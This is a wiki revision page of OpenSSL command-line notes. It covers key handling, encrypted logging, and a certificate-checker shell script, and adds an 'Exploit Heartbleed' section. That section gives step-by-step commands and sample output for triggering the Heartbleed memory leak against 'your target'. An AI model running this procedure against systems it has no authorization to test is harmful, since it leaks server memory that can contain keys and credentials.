Difference between revisions of "OpenSSL notes"

From Noah.org
Jump to navigationJump to search
 
(5 intermediate revisions by the same user not shown)
Line 26: Line 26:
 
<pre>
 
<pre>
 
cat log.bf | openssl bf -d -salt
 
cat log.bf | openssl bf -d -salt
 +
</pre>
 +
 +
== get certificate details from a remote SSL host ==
 +
 +
This will download the SSL cert currently in use on a remote host. This uses openssl in client mode to retrieve and decode the certificate on the remote server.
 +
<pre>
 +
openssl s_client -connect www.noah.org:443 </dev/null 2>/dev/null | openssl x509 -text -noout
 +
</pre>
 +
 +
Some of the more interesting fields can be parsed into variables.
 +
<pre>
 +
NOW=$(date "+%s")
 +
CERT_INFO=$(openssl s_client -connect www.noah.org:443 </dev/null 2>/dev/null | openssl x509 -text -noout)
 +
CERT_EXPIRATION_DATE=$(echo "${CERT_INFO}" | sed -n 's/.*Not After.*: \(.*\)/\1/p')
 +
CERT_EXPIRATION_SECONDS=$(date '+%s' --date "${CERT_EXPIRATION_DATE}")
 +
CERT_EXPIRATION_DAYS=$((($CERT_EXPIRATION_SECONDS - ${NOW}) / 60 / 60 / 24))
 +
CERT_ISSUER=$(echo "${CERT_INFO}" | sed -n 's/.*Issuer.*: \(.*\)/\1/p')
 +
CERT_ISSUER_CN=$(echo "${CERT_INFO}" | sed -n 's/.*Issuer.*:.*CN=\(.*\)/\1/p')
 +
CERT_SUBJECT=$(echo "${CERT_INFO}" | sed -n 's/.*Subject.*: \(.*\)/\1/p')
 +
CERT_SUBJECT_CN=$(echo "${CERT_INFO}" | sed -n 's/.*Subject.*:.*CN=\(.*\)/\1/p')
 +
</pre>
 +
 +
=== simple SSL cert checker ===
 +
 +
Throw this all together to make a simple SSL certificate checker.
 +
<pre>
 +
#!/bin/sh
 +
# FIXME: This does not handle star certs (*.example.com).
 +
# if echo "${CERT_SUBJECT_CN}" | grep -q -v "*"; then
 +
 +
SSL_HOSTNAME=$1
 +
 +
NOW=$(date "+%s")
 +
CERT_INFO=$(openssl s_client -connect ${SSL_HOSTNAME}:443 </dev/null 2>/dev/null | openssl x509 -text -noout)
 +
CERT_EXPIRATION_DATE=$(echo "${CERT_INFO}" | sed -n 's/.*Not After.*: \(.*\)/\1/p')
 +
CERT_EXPIRATION_SECONDS=$(date '+%s' --date "${CERT_EXPIRATION_DATE}")
 +
CERT_EXPIRATION_DAYS=$(( ( $CERT_EXPIRATION_SECONDS - ${NOW} ) / 60 / 60 / 24))
 +
CERT_ISSUER=$(echo "${CERT_INFO}" | sed -n 's/.*Issuer.*: \(.*\)/\1/p')
 +
CERT_ISSUER_CN=$(echo "${CERT_INFO}" | sed -n 's/.*Issuer.*:.*CN=\(.*\)/\1/p')
 +
CERT_SUBJECT=$(echo "${CERT_INFO}" | sed -n 's/.*Subject.*: \(.*\)/\1/p')
 +
CERT_SUBJECT_CN=$(echo "${CERT_INFO}" | sed -n 's/.*Subject.*:.*CN=\(.*\)/\1/p')
 +
 +
if [ "${CERT_SUBJECT_CN}" != "${SSL_HOSTNAME}" ]; then
 +
        echo "ERROR: SSL hostname does not match Subject CN in the cert." >&2
 +
        echo "SSL_HOSTNAME: ${SSL_HOSTNAME}" >&2
 +
        echo "CERT_SUBJECT_CN: ${CERT_SUBJECT_CN}" >&2
 +
        exit 1
 +
fi
 +
 +
if [ ${CERT_EXPIRATION_DAYS} -lt 0 ]; then
 +
        echo "ERROR: Certificate has expired." >&2
 +
        echo "CERT_EXPIRATION_DATE: ${CERT_EXPIRATION_DATE}" >&2
 +
        exit 1
 +
fi
 +
</pre>
 +
 +
== Exploit Heartbleed ==
 +
 +
Run this command with '''example.com''' replaced with your target.
 +
<pre>
 +
openssl s_client -connect example.com:443 -tlsextdebug -debug -state
 +
</pre>
 +
You will see a bunch of config info and some binary hex dumps with will be terminated with three dashes alone on the last line, '''---'''. The three dashes are your prompt.
 +
<pre>
 +
    0090 - 70 5b be 25 54 06 27 5f-11 10 7f 73 32 37 24 1b  p[.%T.'_...s27$.
 +
    00a0 - 77 6c 7d fa e6 1d bc 59-e3 80 fd 27 d1 bb bc da  wl}....Y...'....
 +
    00b0 - 2f 3d 85 7d e3 81 3c 67-e5 c5 da ce 59 ea 10 a8  /=.}..<g....Y...
 +
 +
    Start Time: 1397375884
 +
    Timeout  : 300 (sec)
 +
    Verify return code: 18 (self signed certificate)
 +
---
 +
</pre>
 +
At this point simply type a capital '''B''' and press Enter. You should receive back one of three respones.
 +
 +
A machine that does not support '''HEARTBEAT''' is not vulnerable and will terminate the connection with a message sort of like this.
 +
<pre>
 +
---
 +
B
 +
HEARTBEATING
 +
140048930530984:error:1413B16D:SSL routines:SSL_F_TLS1_HEARTBEAT:peer does not accept heartbearts:t1_lib.c:2566:
 +
write to 0x9d0e20 [0x9da953] (27 bytes => 27 (0x1B))
 +
0000 - 15 03 01 00 16 eb 69 1b-3d 72 d9 5d fd 57 4d 1a  ......i.=r.].WM.
 +
0010 - 45 86 c6 41 13 e9 0c 1c-07 ee 9e                  E..A.......
 +
SSL3 alert write:warning:close notif
 +
</pre>
 +
A machine that supports '''HEARTBEAT''' but is '''not''' vulnerable will print a short binary hex dump followed by the '''---''' prompt. You may type '''B''' again and press Enter. But there should be nothing interesting to do now so type '''CTRL-C''' to exit.
 +
<pre>
 +
---
 +
B
 +
HEARTBEATING
 +
write to 0x230a500 [0x2314543] (66 bytes => 66 (0x42))
 +
0000 - 18 03 03 00 3d ae c1 35-6d b9 f2 92 b8 cf 5c c8  ....=..5m.....\.
 +
0010 - 6e 10 14 d1 c0 62 1c 04-30 30 e5 84 ef c1 18 b3  n....b..00......
 +
0020 - 35 71 67 70 c2 58 67 4d-4c 02 4c 32 0c cb 80 9a  5qgp.XgML.L2....
 +
0030 - 1c fc 82 de fb f6 a3 f4-a6 77 f2 21 46 00 6f 19  .........w.!F.o.
 +
0040 - ae 65                                            .e
 +
read from 0x230a500 [0x230fff3] (5 bytes => 5 (0x5))
 +
0000 - 18 03 03 00 3d                                    ....=
 +
read from 0x230a500 [0x230fff8] (61 bytes => 61 (0x3D))
 +
0000 - 8a 96 0e 19 3e dd 76 2a-fd 4f eb 7f e0 f1 f2 66  ....>.v*.O.....f
 +
0010 - f5 b2 98 52 96 a6 de 53-de 6d ca 64 68 cb 3c 22  ...R...S.m.dh.<"
 +
0020 - d9 62 fd 7c 2a 45 2c a4-fd 49 4e bd 2f 96 18 0d  .b.|*E,..IN./...
 +
0030 - 81 fb a5 ee e0 73 a1 a1-43 b5 a0 ce cc            .....s..C....
 +
read R BLOCK
 +
</pre>
 +
A machine that is vulnerable will print a very long binary hex dump followed by the '''---''' prompt. You may type '''B''' again and press Enter. Keep doing that. When you get bored type '''CTRL-C''' to exit.
 +
<pre>
 +
---
 +
B
 +
HEARTBEATING
 +
write to 0x801818160 [0x8019d5803] (58 bytes => 58 (0x3A))
 +
0000 - 18 03 03 00 35 dd 8d 53-31 40 33 fb d4 f9 cb 0e  ....5..S1@3.....
 +
0010 - d6 a2 8c bd 9c 33 dd 26-99 32 fa 96 ed 3d 25 84  .....3.&.2...=%.
 +
0020 - 16 f5 06 e3 38 1f bc eb-1b d7 f4 dc 23 3e e2 f7  ....8.......#>..
 +
  ... removed for brevity ...
 +
0570 - f5 8d ed a6 3a a8 d5 9f-d5 72 c0 dc 21 69 6d 02  ....:....r..!im.
 +
0580 - ca 95 60 c4 1e a0 4e 7d-46 5d 97 62 77 e1 f5 8e  ..`...N}F].bw...
 +
0590 - 4c f6 ec c4 47 50 04 5f-b9 8e 00 8c 58 a7 c9 8d  L...GP._....X...
 +
  ... removed for brevity ...
 
</pre>
 
</pre>

Latest revision as of 01:22, 13 April 2014


External OpenSSL Command-line FAQ

This OpenSSL HowTo/FAQ deals with the command-line openssl.

Remove password from OpenVPN key

The user's client.key generated by `openvpn --genkey` is an OpenSSL RSA key. You can use `openssl` commands on the key. This will overwrite the existing user.key file:

openssl rsa -in client.key -out client.key

Encrypt output of a command to log file

It is pretty trivial to send output from a command to an encrypted log file. This is useful if running a server in debug mode where log output might contain sensitive information such as personal information or passwords.

some_command | openssl bf -e -salt -out log.bf

You can decrypt the log file while the command is still running.

cat log.bf | openssl bf -d -salt

get certificate details from a remote SSL host

This will download the SSL cert currently in use on a remote host. This uses openssl in client mode to retrieve and decode the certificate on the remote server.

openssl s_client -connect www.noah.org:443 </dev/null 2>/dev/null | openssl x509 -text -noout

Some of the more interesting fields can be parsed into variables.

NOW=$(date "+%s")
CERT_INFO=$(openssl s_client -connect www.noah.org:443 </dev/null 2>/dev/null | openssl x509 -text -noout)
CERT_EXPIRATION_DATE=$(echo "${CERT_INFO}" | sed -n 's/.*Not After.*: \(.*\)/\1/p')
CERT_EXPIRATION_SECONDS=$(date '+%s' --date "${CERT_EXPIRATION_DATE}")
CERT_EXPIRATION_DAYS=$((($CERT_EXPIRATION_SECONDS - ${NOW}) / 60 / 60 / 24))
CERT_ISSUER=$(echo "${CERT_INFO}" | sed -n 's/.*Issuer.*: \(.*\)/\1/p')
CERT_ISSUER_CN=$(echo "${CERT_INFO}" | sed -n 's/.*Issuer.*:.*CN=\(.*\)/\1/p')
CERT_SUBJECT=$(echo "${CERT_INFO}" | sed -n 's/.*Subject.*: \(.*\)/\1/p')
CERT_SUBJECT_CN=$(echo "${CERT_INFO}" | sed -n 's/.*Subject.*:.*CN=\(.*\)/\1/p')

simple SSL cert checker

Throw this all together to make a simple SSL certificate checker.

#!/bin/sh
# FIXME: This does not handle star certs (*.example.com).
# if echo "${CERT_SUBJECT_CN}" | grep -q -v "*"; then

SSL_HOSTNAME=$1

NOW=$(date "+%s")
CERT_INFO=$(openssl s_client -connect ${SSL_HOSTNAME}:443 </dev/null 2>/dev/null | openssl x509 -text -noout)
CERT_EXPIRATION_DATE=$(echo "${CERT_INFO}" | sed -n 's/.*Not After.*: \(.*\)/\1/p')
CERT_EXPIRATION_SECONDS=$(date '+%s' --date "${CERT_EXPIRATION_DATE}")
CERT_EXPIRATION_DAYS=$(( ( $CERT_EXPIRATION_SECONDS - ${NOW} ) / 60 / 60 / 24))
CERT_ISSUER=$(echo "${CERT_INFO}" | sed -n 's/.*Issuer.*: \(.*\)/\1/p')
CERT_ISSUER_CN=$(echo "${CERT_INFO}" | sed -n 's/.*Issuer.*:.*CN=\(.*\)/\1/p')
CERT_SUBJECT=$(echo "${CERT_INFO}" | sed -n 's/.*Subject.*: \(.*\)/\1/p')
CERT_SUBJECT_CN=$(echo "${CERT_INFO}" | sed -n 's/.*Subject.*:.*CN=\(.*\)/\1/p')

if [ "${CERT_SUBJECT_CN}" != "${SSL_HOSTNAME}" ]; then
        echo "ERROR: SSL hostname does not match Subject CN in the cert." >&2
        echo "SSL_HOSTNAME: ${SSL_HOSTNAME}" >&2
        echo "CERT_SUBJECT_CN: ${CERT_SUBJECT_CN}" >&2
        exit 1
fi

if [ ${CERT_EXPIRATION_DAYS} -lt 0 ]; then
        echo "ERROR: Certificate has expired." >&2
        echo "CERT_EXPIRATION_DATE: ${CERT_EXPIRATION_DATE}" >&2
        exit 1
fi

Exploit Heartbleed

Run this command with example.com replaced with your target.

openssl s_client -connect example.com:443 -tlsextdebug -debug -state

You will see a bunch of config info and some binary hex dumps with will be terminated with three dashes alone on the last line, ---. The three dashes are your prompt.

    0090 - 70 5b be 25 54 06 27 5f-11 10 7f 73 32 37 24 1b   p[.%T.'_...s27$.
    00a0 - 77 6c 7d fa e6 1d bc 59-e3 80 fd 27 d1 bb bc da   wl}....Y...'....
    00b0 - 2f 3d 85 7d e3 81 3c 67-e5 c5 da ce 59 ea 10 a8   /=.}..<g....Y...

    Start Time: 1397375884
    Timeout   : 300 (sec)
    Verify return code: 18 (self signed certificate)
---

At this point simply type a capital B and press Enter. You should receive back one of three respones.

A machine that does not support HEARTBEAT is not vulnerable and will terminate the connection with a message sort of like this.

---
B
HEARTBEATING
140048930530984:error:1413B16D:SSL routines:SSL_F_TLS1_HEARTBEAT:peer does not accept heartbearts:t1_lib.c:2566:
write to 0x9d0e20 [0x9da953] (27 bytes => 27 (0x1B))
0000 - 15 03 01 00 16 eb 69 1b-3d 72 d9 5d fd 57 4d 1a   ......i.=r.].WM.
0010 - 45 86 c6 41 13 e9 0c 1c-07 ee 9e                  E..A.......
SSL3 alert write:warning:close notif

A machine that supports HEARTBEAT but is not vulnerable will print a short binary hex dump followed by the --- prompt. You may type B again and press Enter. But there should be nothing interesting to do now so type CTRL-C to exit.

---
B
HEARTBEATING
write to 0x230a500 [0x2314543] (66 bytes => 66 (0x42))
0000 - 18 03 03 00 3d ae c1 35-6d b9 f2 92 b8 cf 5c c8   ....=..5m.....\.
0010 - 6e 10 14 d1 c0 62 1c 04-30 30 e5 84 ef c1 18 b3   n....b..00......
0020 - 35 71 67 70 c2 58 67 4d-4c 02 4c 32 0c cb 80 9a   5qgp.XgML.L2....
0030 - 1c fc 82 de fb f6 a3 f4-a6 77 f2 21 46 00 6f 19   .........w.!F.o.
0040 - ae 65                                             .e
read from 0x230a500 [0x230fff3] (5 bytes => 5 (0x5))
0000 - 18 03 03 00 3d                                    ....=
read from 0x230a500 [0x230fff8] (61 bytes => 61 (0x3D))
0000 - 8a 96 0e 19 3e dd 76 2a-fd 4f eb 7f e0 f1 f2 66   ....>.v*.O.....f
0010 - f5 b2 98 52 96 a6 de 53-de 6d ca 64 68 cb 3c 22   ...R...S.m.dh.<"
0020 - d9 62 fd 7c 2a 45 2c a4-fd 49 4e bd 2f 96 18 0d   .b.|*E,..IN./...
0030 - 81 fb a5 ee e0 73 a1 a1-43 b5 a0 ce cc            .....s..C....
read R BLOCK

A machine that is vulnerable will print a very long binary hex dump followed by the --- prompt. You may type B again and press Enter. Keep doing that. When you get bored type CTRL-C to exit.

---
B
HEARTBEATING
write to 0x801818160 [0x8019d5803] (58 bytes => 58 (0x3A))
0000 - 18 03 03 00 35 dd 8d 53-31 40 33 fb d4 f9 cb 0e   ....5..S1@3.....
0010 - d6 a2 8c bd 9c 33 dd 26-99 32 fa 96 ed 3d 25 84   .....3.&.2...=%.
0020 - 16 f5 06 e3 38 1f bc eb-1b d7 f4 dc 23 3e e2 f7   ....8.......#>..
   ... removed for brevity ...
0570 - f5 8d ed a6 3a a8 d5 9f-d5 72 c0 dc 21 69 6d 02   ....:....r..!im.
0580 - ca 95 60 c4 1e a0 4e 7d-46 5d 97 62 77 e1 f5 8e   ..`...N}F].bw...
0590 - 4c f6 ec c4 47 50 04 5f-b9 8e 00 8c 58 a7 c9 8d   L...GP._....X...
   ... removed for brevity ...